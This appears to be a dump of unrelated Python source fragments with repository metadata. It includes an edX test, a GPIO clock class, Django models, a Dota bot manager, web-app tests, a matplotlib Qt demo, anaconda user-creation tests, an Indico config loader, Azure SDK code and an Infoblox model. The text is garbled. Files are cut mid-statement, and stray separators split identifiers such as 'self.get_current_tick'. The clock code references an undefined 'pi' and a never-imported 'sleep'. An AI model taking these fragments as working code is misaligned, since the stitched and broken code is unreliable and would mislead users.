date = timezone.now() + datetime.timedelta(days=100)
self._date_sync(date, unit, other_unit, other_unit)
def test_no_initial_date(self):
self.login_and_enroll()
(__, __, _, other_unit) = self._setup_course_skeleton()
response = self.api_response(
data={
"last_visited_module_id": unicode(other_unit.location),
"modification_date": timezone.now().isoformat()
}
)
self.assertEqual(response.data["last_visited_module_id"], unicode(other_unit.location))
def test_invalid_date(self):
self.login_and_enroll()
response = self.api_response(data={"modification_date": "abc"}, expected_response_code=400)
self.assertEqual(respons
|
Don-Li/CABexpt
|
CABexpt/clock.py
|
Python
|
gpl-3.0
| 1,906 | 0.026233 |
from time import strftime, monotonic
import pigpio
import CABmanager
class clock(object):
"""Clock"""
def __init__( self, pigpio_pi ):
if type( pigpio_pi ) is CAB_manager.CABmanager:
self.pigpio_pi = pigpio_pi.pi
else:
self.pigpio_pi = pigpio_pi
self.tickDiff = pigpio.tickDiff
self.get_current_tick = pi.get_current_tick
self.gpio_time_1 = self.get_current_tick()
self.gpio_time_2 = 0
self.time_now = 0
def update( self ):
self.gpio_time_2 = self.get_current_tick()
self.time_now += self.tickDiff( self.gpio_time_1, self.gpio_time_2 )/1000000.0
self.gpio_time_1 = self.gpio_time_2
return( self.time_now )
def assert_update( self, gpio_time_2 ):
self.gpio_time_2 = gpio_time_2
self.time_now += self.tickDiff( self.gpio_time_1, self.gpio_time_2 )/1000000.0
self.gpio_time_1 = self.gpio_time_2
return( self.time_now )
def get_time( self ):
return( self.time_now )
def reset( self ):
self.gpio_time_1 = s
|
elf.get_current_ti
|
ck()
self.gpio_time_2 = 0
self.time_now = 0
def sleep( self, seconds ):
if seconds <= 0.5:
t1 = monotonic()
while monotonic() - t1 < seconds:
pass
else:
t1 = monotonic()
sleep( seconds - 0.4 )
while monotonic() - t1 < seconds:
pass
return( self.update() )
def get_date_dmy():
"""
Return the date in dd.mm.yyyy format as a string.
"""
return( strftime( "%d.%m.%Y" ) )
def get_date_hm():
"""
Return the time in hh.mm format as a string.
"""
return( strftime( "%H.%M" ) )
def get_date_hmdmy():
"""
Return the time in hh_mm_dd_mm_yyy format as a string
"""
return( strftime( "%H_%M_%d_%m_%Y" ) )
|
dana-i2cat/felix
|
optin_manager/src/python/openflow/optin_manager/users/models.py
|
Python
|
apache-2.0
| 1,961 | 0.022947 |
from django.db import models
from django.contrib import auth
from django.db.models.signals import post_save
class Priority(object):
Aggregate_Admin = 12000
Campus_Admin = 10000
Department_Admin = 8000
Building_Admin = 6000
Group_Admin = 4000
Strict_User = 2000
Nice_User = 1000
Priority_Margin = 2000
Strict_Priority_Offset = 1000
Priority_Scale = 1000
Admins = ["Aggragate Admin", "Campus Admin", "Department Admin",
"Building Admin", "Group Admin"]
class UserProfile(models.Model):
user = models.ForeignKey(auth.models.User, unique=True, related_name = 'profile')
is_net_admin
|
= models.BooleanField("Can Confirm Flow Space Requests", default=False)
is_clearinghouse_user = models.BooleanField("Clearinghouse account", default=False)
max_priority_level = models.IntegerField(null=True) # Otherwise will complain
supervisor = models.ForeignKey(auth.models.User, related_name = 'supervisor')
admin_position = model
|
s.CharField(max_length = 1024, default="")
def __unicode__(self):
try:
return "Profile for %s" % self.user
except:
return "No user"
@classmethod
def get_or_create_profile(cls, user):
try:
profile = user.get_profile()
except UserProfile.DoesNotExist:
profile = cls.objects.create(
user=user,
is_net_admin = False,
max_priority_level = Priority.Strict_User,
supervisor = user,
is_clearinghouse_user = False,
)
return profile
from openflow.optin_manager.users.user_signal_handler import super_user_save
post_save.connect(super_user_save, sender=auth.models.User)
|
FroggedTV/grenouilleAPI
|
backend/bot_app.py
|
Python
|
gpl-3.0
| 3,850 | 0.003377 |
import logging
import pickle
import random
from gevent import Greenlet, sleep
from threading import Lock
from app import create_app
from dota_bot import DotaBot
from models import db, DynamicConfiguration, Game,
|
GameStatus, GameVIP
from helpers.general import divide_vip_list_per_type
# Log
logging.basicConfig(format='[%(asctime)s] %(levelname)s %(message)s', level=logging.INFO)
class Credential:
"""A St
|
eam account credentials.
Attributes:
login: Steam user login.
password: Steam user password.
"""
def __init__(self, login, password):
"""Create a user credentials.
Args:
login: user login.
password: user password.
"""
self.login = login
self.password = password
class WorkerManager(Greenlet):
"""Master class starting Dota bots to process jobs.
The manager contains a initial pool of Steam Credentials.
It is a thread pooling jobs from the database, starting new Dota bots when a new job is available.
After a job process, the Dota bot informs that the credentials are available again.
Attributes:
app: The flask application the manager is linked to, containing configuration objects and database access.
working_bots: A dictionary of all currently working Dota bots, indexed by bot login.
"""
def __init__(self):
"""Initialize the worker manager thread."""
Greenlet.__init__(self)
# Initialize
self.app = create_app()
self.working_bots = {}
self.credentials = []
self.mutex = Lock()
# Parse credentials from config
bot_credentials_string = self.app.config['STEAM_BOTS']
bot_credentials = bot_credentials_string.split('@')
i = 0
while i < len(bot_credentials):
login = bot_credentials[i]
password = bot_credentials[i+1]
self.credentials.append(Credential(login, password))
i = i + 2
def _run(self):
"""Start the main loop of the thread, creating Dota bots to process available jobs."""
while True:
with self.app.app_context():
admins, casters = divide_vip_list_per_type(GameVIP.get_all_vips())
bot_pause = DynamicConfiguration.get('bot_pause', 'False')
for game in db.session().query(Game)\
.filter(Game.status==GameStatus.WAITING_FOR_BOT)\
.order_by(Game.id).all():
if len(self.credentials) == 0 or bot_pause == 'True':
continue
# Start a Dota bot to process the game
self.mutex.acquire()
credential = self.credentials.pop(random.randint(0, len(self.credentials) - 1))
g = DotaBot(self, credential, admins, casters, game.id, game.name, game.password,
game.team1, game.team2, game.team1_ids, game.team2_ids, game.team_choosing_first)
self.working_bots[credential.login] = g
game.status = GameStatus.CREATION_IN_PROGRESS
game.bot = credential.login
db.session().commit()
g.start()
self.mutex.release()
sleep(60)
def bot_end(self, credential):
"""Signal that a bot has finished it work and the credential is free to use again.
Args:
credential: `Credential` of the bot.
"""
self.mutex.acquire()
self.working_bots.pop(credential.login)
self.credentials.append(credential)
self.mutex.release()
# Start a Manager if this file is the main script.
if __name__ == '__main__':
g = WorkerManager()
g.start()
g.join()
|
openkamer/openkamer
|
website/tests.py
|
Python
|
mit
| 13,880 | 0.001225 |
import datetime
import logging
from django.contrib.auth.models import User
from django.test import Client
from django.test import TestCase
from django.urls import reverse
from person.models import Person
from parliament.models import ParliamentMember
from parliament.models import PoliticalParty
from document.models import Agenda
from document.models import CategoryDossier
from document.models import CategoryDocument
from document.models import Dossier
from document.models import Document
from document.models import Kamerstuk
from document.models import Voting
import openkamer.document
import openkamer.dossier
import openkamer.kamerstuk
logger = logging.getLogger(__name__)
class TestExample(TestCase):
def test_example(self):
logger.info('BEGIN')
logger.info('END')
class TestFindParliamentMembers(TestCase):
fixtures = ['person.json', 'parliament.json']
def test_find_member(self):
surname = 'Zijlstra'
forename = 'Halbe'
initials = 'H.'
member = ParliamentMember.find(surname=surname, initials=initials)
self.assertEqual(member.person.forename, forename)
def test_find_member_surname_prefix(self):
surname = 'Weyenberg van'
forename = 'Steven'
initials = 'S.P.R.A.'
member = ParliamentMember.find(surname=surname, initials=initials)
self.assertEqual(member.person.forename, forename)
surname = 'van Weyenberg'
member = ParliamentMember.find(surn
|
ame=surname, initials=initials)
self.assertEqual(member.person.forename, forename)
def test_find_member_non_ascii(self):
surname = 'Koser Kaya'
forename = 'Fatma'
initials = 'F.'
member = ParliamentMember.find(surname=surname, initials=initials)
self.assertEqual(member.person.for
|
ename, forename)
surname = 'Koşer Kaya'
member = ParliamentMember.find(surname=surname, initials=initials)
self.assertEqual(member.person.forename, forename)
class TestPersonView(TestCase):
fixtures = ['person.json']
@classmethod
def setUpTestData(cls):
cls.client = Client()
def test_persons_overview(self):
response = self.client.get(reverse('persons'))
self.assertEqual(response.status_code, 200)
def test_person_overview(self):
persons = Person.objects.all()[:10]
for person in persons:
response = self.client.get(reverse('person', args=(person.slug,)))
self.assertEqual(response.status_code, 200)
def test_person_check_view(self):
response = self.client.get(reverse('persons-check'))
self.assertEqual(response.status_code, 200)
class TestWebsite(TestCase):
fixtures = ['person.json', 'parliament.json', 'government.json']
@classmethod
def setUpTestData(cls):
# TODO: improve performance of votings (tkapi)
openkamer.dossier.create_dossier_retry_on_error(33885)
openkamer.dossier.create_dossier_retry_on_error(33506)
cls.client = Client()
def test_homepage(self):
response = self.client.get('/')
self.assertEqual(response.status_code, 200)
def test_persons_overview(self):
response = self.client.get(reverse('persons'))
self.assertEqual(response.status_code, 200)
def test_person_overview(self):
persons = Person.objects.all()[:10]
for person in persons:
response = self.client.get(reverse('person', args=(person.slug,)))
self.assertEqual(response.status_code, 200)
def test_person_autocomplete_view(self):
response = self.client.get(reverse('person-autocomplete') + '?q=samsom')
self.assertEqual(response.status_code, 200)
def test_dossiers_overview(self):
response = self.client.get(reverse('wetsvoorstellen'))
self.assertEqual(response.status_code, 200)
def test_dossiers_filter_view(self):
ivo = Person.objects.filter(forename='Ivo', surname='Opstelten')[0]
response = self.client.get(reverse('wetsvoorstellen') + '?title=wet&submitter=' + str(ivo.id) + '&voting_result=AAN')
self.assertEqual(response.status_code, 200)
def test_dossier_views(self):
dossiers = Dossier.objects.all()
for dossier in dossiers:
response = self.client.get(reverse('dossier-tiles', args=(dossier.dossier_id,)))
self.assertEqual(response.status_code, 200)
def test_timeline_views(self):
dossiers = Dossier.objects.all()
for dossier in dossiers:
response = self.client.get(reverse('dossier-timeline', args=(dossier.dossier_id,)))
self.assertEqual(response.status_code, 200)
def test_timeline_horizontal_views(self):
dossiers = Dossier.objects.all()
for dossier in dossiers:
response = self.client.get(reverse('dossier-timeline-horizontal', args=(dossier.dossier_id,)))
self.assertEqual(response.status_code, 200)
response = self.client.get('/dossier/timeline/horizontal/json/?dossier_pk=' + str(dossier.id))
self.assertEqual(response.status_code, 200)
def test_document_view(self):
documents = Document.objects.all()
for document in documents:
response = self.client.get(reverse('document', args=(document.document_id,)))
self.assertEqual(response.status_code, 200)
def test_kamerstuk_view(self):
kamerstukken = Kamerstuk.objects.all()
for kamerstuk in kamerstukken:
response = self.client.get(reverse('kamerstuk', args=(kamerstuk.id_main, kamerstuk.id_sub,)))
self.assertEqual(response.status_code, 200)
def test_kamerstuk_modifications(self):
kamerstuk_08 = Kamerstuk.objects.get(id_main='33885', id_sub='8')
kamerstuk_11 = Kamerstuk.objects.get(id_main='33885', id_sub='11')
kamerstuk_29 = Kamerstuk.objects.get(id_main='33885', id_sub='29')
kamerstuk_original = Kamerstuk.objects.get(id_main='33885', id_sub='2')
self.assertEqual(kamerstuk_08.original, kamerstuk_original)
self.assertEqual(kamerstuk_11.original, kamerstuk_original)
self.assertEqual(kamerstuk_29.original, kamerstuk_original)
modifications = [kamerstuk_08, kamerstuk_11, kamerstuk_29]
for modification in kamerstuk_original.modifications:
self.assertTrue(modification in modifications)
def test_agendas_view(self):
response = self.client.get('/agendas/')
self.assertEqual(response.status_code, 200)
def test_agenda_view(self):
agendas = Agenda.objects.all()
for agenda in agendas:
response = self.client.get('/agenda/' + str(agenda.agenda_id) + '/')
self.assertEqual(response.status_code, 200)
def test_votings_overview(self):
response = self.client.get(reverse('votings'))
self.assertEqual(response.status_code, 200)
def test_voting_view(self):
votings = Voting.objects.all()
for voting in votings:
if voting.is_dossier_voting:
response = self.client.get(reverse('voting-dossier', args=(voting.dossier.dossier_id,)))
elif voting.kamerstuk:
response = self.client.get(reverse('voting-kamerstuk', args=(voting.kamerstuk.id_main, voting.kamerstuk.id_sub,)))
else:
print('WARNING: no kamerstuk found for voting id: {}'.format(voting.id))
continue
self.assertEqual(response.status_code, 200)
def test_parties_overview(self):
response = self.client.get(reverse('parties'))
self.assertEqual(response.status_code, 200)
def test_party_view(self):
parties = PoliticalParty.objects.all()
for party in parties:
if not party.slug:
print('WARNING: Empty party found, skipping view')
continue
response = self.client.get(reverse('party', args=(party.slug,)))
self.assertEqual(response.status_code, 200)
self.assertGreaterEqual(len(parties), 50)
def test_parliament_members_overview(self):
|
RyanChinSang/ECNG3020-ORSS4SCVI
|
BETA/TestCode/Matplotlib/mpl1.py
|
Python
|
gpl-3.0
| 3,865 | 0.001811 |
from __future__ import unicode_literals
import sys
import os
import random
import matplotlib
# Make sure that we are using QT5
matplotlib.use('Qt5Agg')
from PyQt5 import QtCore, QtWidgets
from numpy import arange, sin, pi
from matplotlib.backends.backend_qt5agg import FigureCanvasQTAgg as FigureCanvas
from matplotlib.figure import Figure
progname = os.path.basename(sys.argv[0])
progversion = "0.1"
class MyMplCanvas(FigureCanvas):
"""Ultimately, this is a QWidget (as well as a FigureCanvasAgg, etc.)."""
def __init__(self, parent=None, width=5, height=4, dpi=100):
fig = Figure(figsize=(width, height), dpi=dpi)
self.axes = fig.add_subplot(111)
self.compute_initial_figure()
FigureCanvas.__init__(self, fig)
self.setParent(parent)
FigureCanvas.setSizePolicy(self,
QtWidgets.QSizePolicy.Expanding,
QtWidgets.QSizePolicy.Expanding)
FigureCanvas.updateGeometry(self)
def compute_initial_figure(self):
pass
class MyStaticMplCanvas(MyMplCanvas):
"""Simple canvas with a sine plot."""
def compute_initial_figure(self):
t = arange(0.0, 3.0, 0.01)
s = sin(2 * pi * t)
self.axes.plot(t, s)
class MyDynamicMplCanvas(MyMplCanvas):
"""A canvas that updates itself every second with a new plot."""
def __init__(self, *args, **kwargs):
MyMplCanvas.__init__(self, *args, **kwargs)
timer = QtCore.QTimer(self)
timer.timeout.connect(self.update_figure)
timer.start(1000)
def compute_initial_figure(self):
self.axes.plot([0, 1, 2, 3], [1, 2, 0, 4], 'r')
def update_figure(self):
# Build a list of 4 random integers between 0 and 10 (both inclusive)
l = [random.randint(0, 10) for i in range(4)]
self.axes.cla()
self.axes.plot([0, 1, 2, 3], l, 'r')
self.draw()
class ApplicationWindow(QtWidgets.QMainWindow):
def __init__(self):
QtWidgets.QMainWindow.__init__(self)
self.setAttribute(QtCore.Qt.WA_DeleteOnClose)
self.setWindowTitle("application main window")
self.file_menu = QtWidgets.QMenu('&File', self)
self.file_menu.addAction('&Quit', self.fileQuit,
QtCore.Qt.CTRL + QtCore.Qt.Key_Q)
self.menuBar().addMenu(self.file_menu)
self.help_menu = QtWidgets.QMenu('&Help', self)
self.menuBar().addSeparator()
self.menuBar().addMenu(self.help_menu)
self.help_menu.addAction('&About', self.about)
self.main_widget = QtWidgets.QWidget(self)
l = QtWidgets.QVBoxLayout(self.main_widget)
sc = MyStaticMplCanvas(self.main_widget, width=5, height=4, dpi=100)
dc = MyDynamicMplCanvas(self.main_widget, width=5, height=4, dpi=100)
l.addWidget(sc)
l.addWidget(dc)
self.main_widget.setFocus()
|
self.setCentralWidget(self.main_widget)
self.statusBar().showMessage("All hail matplotlib!", 2000)
def fileQuit(self):
self.close()
def closeEvent(self, ce):
self.fileQuit()
def about(self):
QtWid
|
gets.QMessageBox.about(self, "About",
"""embedding_in_qt5.py example
Copyright 2005 Florent Rougon, 2006 Darren Dale, 2015 Jens H Nielsen
This program is a simple example of a Qt5 application embedding matplotlib
canvases.
It may be used and modified with no restriction; raw copies as well as
modified versions may be distributed without limitation.
This is modified from the embedding in qt4 example to show the difference
between qt4 and qt5"""
)
qApp = QtWidgets.QApplication(sys.argv)
aw = ApplicationWindow()
aw.setWindowTitle("%s" % progname)
aw.show()
sys.exit(qApp.exec_())
# qApp.exec_()
|
dashea/anaconda
|
tests/pyanaconda_tests/user_create_test.py
|
Python
|
gpl-2.0
| 15,039 | 0.001596 |
# vim:set fileencoding=utf-8
#
# Copyright (C) 2015 Red Hat, Inc.
#
# This copyrighted material is made available to anyone wishing to use,
# modify, copy, or redistribute it subject to the terms and conditions of
# the GNU General Public License v.2, or (at your option) any later version.
# This program is distributed in the hope that it will be useful, but WITHOUT
# ANY WARRANTY expressed or implied, including the implied warranties of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General
# Public License for more details. You should have received a copy of the
# GNU General Public License along with this program; if not, write to the
# Free Software Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA
# 02110-1301, USA. Any Red Hat trademarks that are incorporated in the
# s
|
ource code or documentation are not subject to the GNU General Public
# License and may only be used or replicated with the express permission of
# Red Hat, Inc.
#
# Red Hat Author(s): David Shea <dshea@redhat.com>
#
from pyanaconda import users
import unittest
import tempfile
import shutil
import os
import crypt
import platform
import glob
@unittest.skipIf(os.geteuid() != 0, "user creation must
|
be run as root")
class UserCreateTest(unittest.TestCase):
def setUp(self):
self.users = users.Users()
# Create a temporary directory with empty passwd and group files
self.tmpdir = tempfile.mkdtemp()
os.mkdir(self.tmpdir + "/etc")
open(self.tmpdir + "/etc/passwd", "w").close()
open(self.tmpdir + "/etc/group", "w").close()
open(self.tmpdir + "/etc/shadow", "w").close()
open(self.tmpdir + "/etc/gshadow", "w").close()
# Copy over enough of libnss for UID and GID lookups to work
with open(self.tmpdir + "/etc/nsswitch.conf", "w") as f:
f.write("passwd: files\n")
f.write("shadow: files\n")
f.write("group: files\n")
f.write("initgroups: files\n")
if platform.architecture()[0].startswith("64"):
libdir = "/lib64"
else:
libdir = "/lib"
os.mkdir(self.tmpdir + libdir)
for lib in glob.glob(libdir + "/libnss_files*"):
shutil.copy(lib, self.tmpdir + lib)
def tearDown(self):
shutil.rmtree(self.tmpdir)
def _readFields(self, filename, key):
"""Look for a line in a password or group file where the first field
matches key, and return the record as a list of fields.
"""
with open(self.tmpdir + filename) as f:
for line in f:
fields = line.strip().split(':')
if fields[0] == key:
return fields
return None
def create_group_test(self):
"""Create a group."""
self.users.createGroup("test_group", root=self.tmpdir)
fields = self._readFields("/etc/group", "test_group")
self.assertIsNotNone(fields)
self.assertEqual(fields[0], "test_group")
fields = self._readFields("/etc/gshadow", "test_group")
self.assertIsNotNone(fields)
self.assertEqual(fields[0], "test_group")
def create_group_gid_test(self):
"""Create a group with a specific GID."""
self.users.createGroup("test_group", gid=47, root=self.tmpdir)
fields = self._readFields("/etc/group", "test_group")
self.assertIsNotNone(fields)
self.assertEqual(fields[0], "test_group")
self.assertEqual(fields[2], "47")
def create_group_exists_test(self):
"""Create a group that already exists."""
with open(self.tmpdir + "/etc/group", "w") as f:
f.write("test_group:x:47:\n")
self.assertRaises(ValueError, self.users.createGroup, "test_group", root=self.tmpdir)
def create_group_gid_exists_test(self):
"""Create a group with a GID that already exists."""
with open(self.tmpdir + "/etc/group", "w") as f:
f.write("gid_used:x:47:\n")
self.assertRaises(ValueError, self.users.createGroup, "test_group", gid=47, root=self.tmpdir)
def create_user_test(self):
"""Create a user."""
self.users.createUser("test_user", root=self.tmpdir)
pwd_fields = self._readFields("/etc/passwd", "test_user")
self.assertIsNotNone(pwd_fields)
self.assertEqual(pwd_fields[0], "test_user")
# Check that the fields got the right default values
# UID + GID set to some sort of int
self.assertTrue(isinstance(int(pwd_fields[2]), int))
self.assertTrue(isinstance(int(pwd_fields[3]), int))
# home is /home/username
self.assertEqual(pwd_fields[5], "/home/test_user")
# shell set to something
self.assertTrue(pwd_fields[6])
shadow_fields = self._readFields("/etc/shadow", "test_user")
self.assertIsNotNone(shadow_fields)
self.assertEqual(shadow_fields[0], "test_user")
# Ensure the password is locked
self.assertTrue(shadow_fields[1].startswith("!"))
# Ensure the date of last password change is empty
self.assertEqual(shadow_fields[2], "")
# Check that the user group was created
grp_fields = self._readFields("/etc/group", "test_user")
self.assertIsNotNone(grp_fields)
self.assertEqual(grp_fields[0], "test_user")
# Check that user group's GID matches the user's GID
self.assertEqual(grp_fields[2], pwd_fields[3])
gshadow_fields = self._readFields("/etc/gshadow", "test_user")
self.assertIsNotNone(gshadow_fields)
self.assertEqual(gshadow_fields[0], "test_user")
def create_user_text_options_test(self):
"""Create a user with the text fields set."""
self.users.createUser("test_user", gecos="Test User", homedir="/home/users/testuser", shell="/bin/test", root=self.tmpdir)
pwd_fields = self._readFields("/etc/passwd", "test_user")
self.assertIsNotNone(pwd_fields)
self.assertEqual(pwd_fields[0], "test_user")
self.assertEqual(pwd_fields[4], "Test User")
self.assertEqual(pwd_fields[5], "/home/users/testuser")
self.assertEqual(pwd_fields[6], "/bin/test")
# Check that the home directory was created
self.assertTrue(os.path.isdir(self.tmpdir + "/home/users/testuser"))
def create_user_groups_test(self):
"""Create a user with a list of groups."""
# Create one of the groups
self.users.createGroup("test3", root=self.tmpdir)
# Create a user and add it three groups, two of which do not exist,
# and one which specifies a GID.
self.users.createUser("test_user", groups=["test1", "test2(5001)", "test3"], root=self.tmpdir)
grp_fields1 = self._readFields("/etc/group", "test1")
self.assertEqual(grp_fields1[3], "test_user")
grp_fields2 = self._readFields("/etc/group", "test2")
self.assertEqual(grp_fields2[3], "test_user")
self.assertEqual(grp_fields2[2], "5001")
grp_fields3 = self._readFields("/etc/group", "test3")
self.assertEqual(grp_fields3[3], "test_user")
def create_user_groups_gid_conflict_test(self):
"""Create a user with a bad list of groups."""
# Create one of the groups
self.users.createGroup("test3", gid=5000, root=self.tmpdir)
# Add test3 to the group list with a different GID.
self.assertRaises(ValueError, self.users.createUser,
"test_user", groups=["test3(5002)"], root=self.tmpdir)
def create_user_password_test(self):
"""Create a user with a password."""
self.users.createUser("test_user1", password="password", root=self.tmpdir)
shadow_fields = self._readFields("/etc/shadow", "test_user1")
self.assertIsNotNone(shadow_fields)
# Make sure the password works
self.assertEqual(crypt.crypt("password", shadow_fields[1]), shadow_fields[1])
# Set the encrypted password for another user with isCrypted
cryptpw = shadow_fields[1]
self.users.createUser("test_user2", password=cryptpw, isCrypted=True, root=sel
|
pferreir/indico-backup
|
indico/MaKaC/common/MaKaCConfig.py
|
Python
|
gpl-3.0
| 1,407 | 0.013504 |
# -*- coding: utf-8 -*-
##
##
## This file is part of Indico.
## Copyright (C) 2002 - 2014 European Organization for Nuclear Research (CERN).
##
## Indico is free software; you can redistribute it and/or
## modify it under the terms of the GNU General Public License as
## published by the Free Software Foundation; either version 3 of the
## License, or (at your option) any later version.
##
## Indico is distributed in the hope that it will be useful, but
## WITHOUT ANY WARRANTY; without even the implied warranty of
## MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
## General Public License for more details.
##
## You should have received a copy of the GNU General Public License
## along with Indico;if not, see <http://www.gnu.org/licenses/>.
## WARNING: THE FOLLOWING LINE WILL BE OVERWRITTEN AT INSTALLATION TIME
indico_conf = "" # path to indico.conf
##
import os
if indico_conf == '': # we may be in development mode or in installation mode
indico_conf = os.path.
|
join(os.path.dirname(__file__), '..', '..', '..', 'etc', 'indico.conf')
if not os.path.exists(indico_conf):
# eggmode
indico_conf = os.path.join(os.path.dirname(__file__), '..', '..', 'etc', 'indico.conf.sample')
if not os.path.exists(indico_conf):
i
|
ndico_conf = os.path.join(os.path.dirname(__file__), '..', '..', '..', 'etc', 'indico.conf.sample')
execfile(indico_conf)
|
Azure/azure-sdk-for-python
|
sdk/network/azure-mgmt-network/azure/mgmt/network/v2018_12_01/operations/_connection_monitors_operations.py
|
Python
|
mit
| 42,196 | 0.00519 |
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
from typing import TYPE_CHECKING
import warnings
from azure.core.exceptions import ClientAuthenticationError, HttpResponseError, ResourceExistsError, ResourceNotFoundError, map_error
from azure.core.paging import ItemPaged
from azure.core.pipeline import PipelineResponse
from azure.core.pipeline.transport import HttpRequest, HttpResponse
from azure.core.polling import LROPoller, NoPolling, PollingMethod
from azure.mgmt.core.exceptions import ARMErrorFormat
from azure.mgmt.core.polling.arm_polling import ARMPolling
from .. import models as _models
if TYPE_CHECKING:
# pylint: disable=unused-import,ungrouped-imports
from typing import Any, Callable, Dict, Generic, Iterable, Optional, TypeVar, Union
T = TypeVar('T')
ClsType = Optional[Callable[[PipelineResponse[HttpRequest, HttpResponse], T, Dict[str, Any]], Any]]
class ConnectionMonitorsOperations(object):
"""ConnectionMonitorsOperations operations.
You should not instantiate this class directly. Instead, you should create a Client instance that
instantiates it for you and attaches it as an attribute.
:ivar models: Alias to model classes used in this operation group.
:type models: ~azure.mgmt.network.v2018_12_01.models
:param client: Client for service requests.
:param config: Configuration of service client.
:param serializer: An object model serializer.
:param deserializer: An object model deserializer.
"""
models = _models
def __init__(self, client, config, serializer, deserializer):
self._client = client
self._serialize = serializer
self._deserialize = deserializer
self._config = config
def _create_or_update_initial(
self,
resource_group_name, # type: str
network_watcher_name, # type: str
connection_monitor_name, # type: str
parameters, # type: "_models.ConnectionMonitor"
**kwargs # type: Any
):
# type: (...) -> "_models.ConnectionMonitorResult"
cls = kwargs.pop('cls', None) # type: ClsType["_models.ConnectionMonitorResult"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2018-12-01"
content_type = kwargs.pop("content_type", "application/json")
accept = "application/json"
# Construct URL
url = self._create_or_update_initial.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'networkWatcherName': self._serialize.url("network_watcher_name", network_watcher_name, 'str'),
'connectionMonitorName': self._serialize.url("connection_monitor_name", connection_monitor_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str')
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
body_content_kwargs = {} # type: Dict[str, Any]
body_content = self._serialize.body(parameters, 'ConnectionMonitor')
body_content_kwargs['content'] = body_content
request = self._client.put(url, query_parameters, header_parameters, **body_content_kwargs)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200, 201]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.ErrorResponse, response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
if response.status_code == 200:
deserialized = self._deserialize('ConnectionMonitorResult', pipeline_response)
if response.status_code == 201:
deserialized = self._deserialize('ConnectionMonitorResult', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
_create_or_update_initial.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/networkWatchers/{networkWatcherName}/connectionMonitors/{connectionMonitorName}'} # type: igno
|
re
def begin_create_or_update(
self,
resource_group_name, # type: str
network_watcher_name, # type: str
connection_monitor_name, # type: str
parameters, # type: "_models.ConnectionMonitor"
**kwargs # type: Any
):
# type: (...) -> LROPoller["_models.ConnectionMonitorResu
|
lt"]
"""Create or update a connection monitor.
:param resource_group_name: The name of the resource group containing Network Watcher.
:type resource_group_name: str
:param network_watcher_name: The name of the Network Watcher resource.
:type network_watcher_name: str
:param connection_monitor_name: The name of the connection monitor.
:type connection_monitor_name: str
:param parameters: Parameters that define the operation to create a connection monitor.
:type parameters: ~azure.mgmt.network.v2018_12_01.models.ConnectionMonitor
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: By default, your polling method will be ARMPolling.
Pass in False for this operation to not poll, or pass in your own initialized polling object for a personal polling strategy.
:paramtype polling: bool or ~azure.core.polling.PollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no Retry-After header is present.
:return: An instance of LROPoller that returns either ConnectionMonitorResult or the result of cls(response)
:rtype: ~azure.core.polling.LROPoller[~azure.mgmt.network.v2018_12_01.models.ConnectionMonitorResult]
:raises ~azure.core.exceptions.HttpResponseError:
"""
polling = kwargs.pop('polling', True) # type: Union[bool, PollingMethod]
cls = kwargs.pop('cls', None) # type: ClsType["_models.ConnectionMonitorResult"]
lro_delay = kwargs.pop(
'polling_interval',
self._config.polling_interval
)
cont_token = kwargs.pop('continuation_token', None) # type: Optional[str]
if cont_token is None:
raw_result = self._create_or_update_initial(
resource_group_name=resource_group_name,
network_watcher_name=network_watcher_name,
connection_monitor_name=connection_monitor_name,
parameters=parameters,
cls=lambda x,y,z: x,
**kwargs
)
kwargs.pop('error_map', None)
kwargs.pop('content_type', None)
def get_long_running_output(pipeline_response):
deserialized = self._deserialize('
|
infobloxopen/infoblox-netmri
|
infoblox_netmri/api/remote/models/spm_devices_vendor_model_grid_remote.py
|
Python
|
apache-2.0
| 4,572 | 0.00175 |
from ..remote import RemoteModel
from infoblox_netmri.utils.utils import check_api_availability
class SpmDevicesVendorModelGridRemote(RemoteModel):
"""
This table lists all SPM devices that existed within the user specified period of time sorted by the Device Name in ascending order.
| ``id:`` The internal NetMRI identif
|
ier of the grid entry.
| ``attribute type:`` number
| ``Network:`` The name of the Network View associated.
| ``attribute type:`` string
| ``DeviceID:`` The NetMRI internal identifier for the device.
| ``attribute type:`` number
| ``DeviceName:`` The NetMRI name of the device; this will be either the same as DeviceSysName or DeviceDNSName, depending on your NetMRI configuration.
| ``attribute type:`` string
| ``De
|
viceIPDotted:`` The management IP address of the device, in dotted (or colon-delimited for IPv6) format.
| ``attribute type:`` string
| ``DeviceIPNumeric:`` The numerical value of the device IP address.
| ``attribute type:`` number
| ``DeviceDNSName:`` The device name as reported by DNS.
| ``attribute type:`` string
| ``TotalPorts:`` Total number of ports.
| ``attribute type:`` number
| ``FreePorts:`` Number of free ports.
| ``attribute type:`` number
| ``FreePortsPercentage:`` Percentage of all ports that are free.
| ``attribute type:`` number
| ``AvailPorts:`` Number of available ports.
| ``attribute type:`` number
